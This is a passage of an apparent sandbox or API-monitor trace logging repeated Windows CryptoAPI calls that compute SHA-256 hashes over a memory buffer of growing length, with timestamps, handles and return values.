CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.301] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.301] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x7e0, dwFlags=0x0) returned 1 [0262.301] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.301] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2de500, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2de500, pdwDataLen=0x1ee448) returned 1 [0262.301] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.301] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.301] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.302] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.302] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x800, dwFlags=0x0) returned 1 [0262.302] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.302] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2de530, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2de530, pdwDataLen=0x1ee448) returned 1 [0262.302] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.302] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.302] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.303] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.303] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x820, dwFlags=0x0) returned 1 [0262.303] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.303] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2de560, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2de560, pdwDataLen=0x1ee448) returned 1 [0262.303] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.303] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.303] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.303] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.304] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x840, dwFlags=0x0) returned 1 [0262.304] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.304] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2de590, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2de590, pdwDataLen=0x1ee448) returned 1 [0262.304] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.304] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.304] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.304] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.304] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x860, dwFlags=0x0) returned 1 [0262.304] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.304] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2de5c0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2de5c0, pdwDataLen=0x1ee448) returned 1 [0262.304] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.304] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.305] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.305] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.305] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x880, dwFlags=0x0) returned 1 [0262.305] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.305] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2de5f0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2de5f0, pdwDataLen=0x1ee448) returned 1 [0262.305] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.305] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.305] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.306] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.306] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x8a0, dwFlags=0x0) returned 1 [0262.306] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.306] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2de620, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2de620, pdwDataLen=0x1ee448) returned 1 [0262.306] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.306] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.306] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.307] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.307] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x8c0, dwFlags=0x0) returned 1 [0262.307] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.307] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2de650, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2de650, pdwDataLen=0x1ee448) returned 1 [0262.307] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.307] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.307] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.308] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.308] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x8e0, dwFlags=0x0) returned 1 [0262.308] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.308] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2de680, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2de680, pdwDataLen=0x1ee448) returned 1 [0262.308] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.308] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.308] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.309] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.309] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x900, dwFlags=0x0) returned 1 [0262.309] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.309] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2de6b0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2de6b0, pdwDataLen=0x1ee448) returned 1 [0262.309] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.309] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.309] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.310] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.310] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x920, dwFlags=0x0) returned 1 [0262.310] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.310] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2de6e0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2de6e0, pdwDataLen=0x1ee448) returned 1 [0262.310] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.310] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.310] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.311] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.311] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x940, dwFlags=0x0) returned 1 [0262.311] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.311] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2de710, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2de710, pdwDataLen=0x1ee448) returned 1 [0262.311] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.311] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.311] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.311] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.311] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x960, dwFlags=0x0) returned 1 [0262.311] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.312] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2de740, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2de740, pdwDataLen=0x1ee448) returned 1 [0262.312] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.312] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.312] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.312] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.312] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x980, dwFlags=0x0) returned 1 [0262.312] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.312] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2de770, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2de770, pdwDataLen=0x1ee448) returned 1 [0262.312] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.312] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.312] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.313] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.313] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x9a0, dwFlags=0x0) returned 1 [0262.313] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.313] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2de7a0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2de7a0, pdwDataLen=0x1ee448) returned 1 [0262.313] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.313] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.313] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.314] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.314] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x9c0, dwFlags=0x0) returned 1 [0262.314] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.314] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2de7d0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2de7d0, pdwDataLen=0x1ee448) returned 1 [0262.314] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.314] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.314] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.315] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.315] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x9e0, dwFlags=0x0) returned 1 [0262.315] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.315] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2de800, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2de800, pdwDataLen=0x1ee448) returned 1 [0262.315] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.315] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.315] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.316] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.316] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xa00, dwFlags=0x0) returned 1 [0262.316] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.316] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2de830, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2de830, pdwDataLen=0x1ee448) returned 1 [0262.316] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.316] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.316] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.316] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.317] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xa20, dwFlags=0x0) returned 1 [0262.317] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.317] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2de860, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2de860, pdwDataLen=0x1ee448) returned 1 [0262.317] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.317] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.317] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.317] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.317] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xa40, dwFlags=0x0) returned 1 [0262.317] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.317] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2de890, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2de890, pdwDataLen=0x1ee448) returned 1 [0262.317] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.317] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.318] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.318] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.318] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xa60, dwFlags=0x0) returned 1 [0262.318] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.318] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2de8c0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2de8c0, pdwDataLen=0x1ee448) returned 1 [0262.318] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.318] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.318] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.319] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.319] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xa80, dwFlags=0x0) returned 1 [0262.319] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.319] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2de8f0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2de8f0, pdwDataLen=0x1ee448) returned 1 [0262.319] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.319] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.319] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.320] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.320] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xaa0, dwFlags=0x0) returned 1 [0262.320] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.320] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2de920, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2de920, pdwDataLen=0x1ee448) returned 1 [0262.320] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.320] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.320] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.321] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.321] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xac0, dwFlags=0x0) returned 1 [0262.321] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.321] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2de950, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2de950, pdwDataLen=0x1ee448) returned 1 [0262.321] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.321] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.321] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.321] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.321] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xae0, dwFlags=0x0) returned 1 [0262.322] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.322] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2de980, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2de980, pdwDataLen=0x1ee448) returned 1 [0262.322] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.322] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.322] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.322] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.322] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xb00, dwFlags=0x0) returned 1 [0262.322] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.322] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2de9b0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2de9b0, pdwDataLen=0x1ee448) returned 1 [0262.322] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.322] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.323] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.323] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.323] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xb20, dwFlags=0x0) returned 1 [0262.323] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.323] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2de9e0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2de9e0, pdwDataLen=0x1ee448) returned 1 [0262.323] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.323] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.323] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.324] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: 